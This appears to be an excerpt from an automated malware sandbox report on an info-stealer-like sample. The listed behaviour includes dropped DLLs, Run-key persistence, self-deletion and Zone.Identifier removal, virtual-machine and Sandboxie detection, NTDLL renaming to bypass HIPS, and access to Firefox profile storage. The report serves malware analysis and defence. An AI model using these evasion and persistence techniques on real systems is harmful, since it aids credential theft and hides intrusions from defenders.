Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\48F3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\XNNLI5Z9\sqlite3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\cwfbibg

Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ahceehaw			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ahceehaw			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\y98wyycj2u.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\cwfbibg:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_0041E250 IsIconic,	5_2_0041E250
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_001EE4A0 IsIconic,	5_2_001EE4A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_0267E250 IsIconic,	9_2_0267E250

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_0043ED64 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_0043ED64

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Renames NTDLL to bypass HIPS

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior

Tries to detect Sandboxie (via GetModuleHandle check)

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Module handle queried: sbiedll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Module handle queried: sbiedll			Jump to behavior

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_726893F6 rdtsc

0_2_726893F6

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 588			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 523			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\XNNLI5Z9\sqlite3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\msiexec.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

API coverage: 1.0 %

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Function Chain: GetTickCount - Sleep - GetTickCount		lf_0
Source: C:\Windows\SysWOW64\msiexec.exe	Function Chain: GetTickCount - Sleep - GetTickCount		lf_0

Source: C:\Windows\explorer.exe TID: 2624	Thread sleep time: -31800s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe TID: 4432	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4924	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4168	Thread sleep count: 39 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043DD11 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	4_2_0043DD11
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0045F48D FindFirstFileExW,	4_2_0045F48D
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043DD31 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	4_2_0043DD31
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043DE7C GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,	4_2_0043DE7C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_0267A650 GetVersionExW,FindFirstFileW,FindNextFileW,	9_2_0267A650

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00434B68 __EH_prolog,GetLogicalDriveStringsA,

4_2_00434B68

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_004365C3 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

4_2_004365C3

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\idb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\	Jump to behavior

Source: explorer.exe, 00000002.00000000.1296722879.0000000003757000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD01#5&2edf08dd&0&010000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BB
Source: explorer.exe, 00000002.00000000.1317716706.0000000008274000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{8b503f78-8607-11e8-8680-806e6f6e6963}#0000000022600000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD01#5&2edf08dd&0&010000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8b503f78-8607-11e8-8680-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.1318331742.0000000008540000.00000002.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531993850.000000004B680000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.1317281691.000000000818D000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD01\5&2EDF08DD&0&010000?i
Source: explorer.exe, 00000002.00000000.1317433367.00000000081EE000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{8b503f78-8607-11e8-8680-806e6f6e6963}#0000000022600000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD01#5&2edf08dd&0&010000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8b503f78-8607-11e8-8680-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&16
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1316309263.0000000008029000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd01#5&2edf08dd&0&010000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}mctl32.dll
Source: explorer.exe, 00000002.00000000.1318331742.0000000008540000.00000002.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531993850.000000004B680000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.1317246449.0000000008163000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.1318331742.0000000008540000.00000002.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531993850.000000004B680000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.1317246449.0000000008163000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD01\5&2edf08dd&0&010000'
Source: explorer.exe, 00000002.00000000.1316309263.0000000008029000.00000004.00000001.sdmp	Binary or memory string: Prod_VMware_SATA_CD01#5&2edf08dd&0&010000#{53fb6bf-1
Source: 3BD3.exe, 00000004.00000002.1528044132.0000000000726000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW(Wv%SystemRoot%\system32\mswsock.dlld
Source: explorer.exe, 00000002.00000000.1317433367.00000000081EE000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{8b503f78-8607-11e8-8680-806e6f6e6963}#0000000022600000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD01#5&2edf08dd&0&010000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8b503f78-8607-11e8-8680-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w3
Source: explorer.exe, 00000002.00000000.1312517964.00000000065C3000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD01-
Source: explorer.exe, 00000002.00000000.1316309263.0000000008029000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd01#5&2edf08dd&0&010000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.1318331742.0000000008540000.00000002.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531993850.000000004B680000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Temp\48F3.exe	API call chain: ExitProcess graph end node
